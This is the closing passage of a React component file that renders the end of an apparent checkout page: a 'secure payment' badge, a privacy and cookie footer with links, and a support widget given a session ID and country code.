                                                <path d="M7 16S.333 13.6.333 8V2.4L7 0l6.667 2.4V8c0 5.6-6.667 8-6.667 8zM9.889 4.717L6.333 8.273 4.556 6.495l-1.061 1.06 2.838 2.839 4.617-4.616-1.061-1.06z" fill="#007782"></path>
                                              </svg>
                                            </div>
                                            <div className="regular-space vertical-spacer"></div>
                                            <h3 className="text-text-class text-sub-class text-felt-class" style={{fontSize: '14px', fontWeight: 400, color: '#666', margin: 0}}>{t.securePayment}</h3>
                                          </div>
                                        </div>
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </main>
                          </div>
                        </div>
                      </div>
                    </div>
                  </section>
                </div>
              </div>
            </section>
            <div>
              <div style={{height: '0px'}}>
                <div className="sticky-footer">
                  <div></div>
                </div>
              </div>
            </div>
          </div>
        </main>
        <div>
          <footer className="privacy-footer">
            <div className="privacy-footer-content-class">
              <div className="container">
                <div className="divider-class"></div>
                <ul className="main-footer-class">
                  <li className="main-footer-class-item">
                    <a className="main-footer-class-link" href={footerPrivacyHref}>{footerPrivacyLabel}</a>
                  </li>
                  <li className="main-footer-class-item">
                    <a className="main-footer-class-link" href={footerCookieHref}>{footerCookieLabel}</a>
                  </li>
                  <li className="main-footer-class-item">
                    <a className="main-footer-class-link" href={footerCookieSettingsHref}>{footerCookieSettingsLabel}</a>
                  </li>
                  <li className="main-footer-class-item">
                    <a className="main-footer-class-link" href={footerTermsHref}>{footerTermsLabel}</a>
                  </li>
                  <li className="main-footer-class-item">
                    <a className="main-footer-class-link" href={footerPlatformHref}>{footerPlatformLabel}</a>
                  </li>
                </ul>
              </div>
            </div>
          </footer>
        </div>
      </div>
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default Index1;

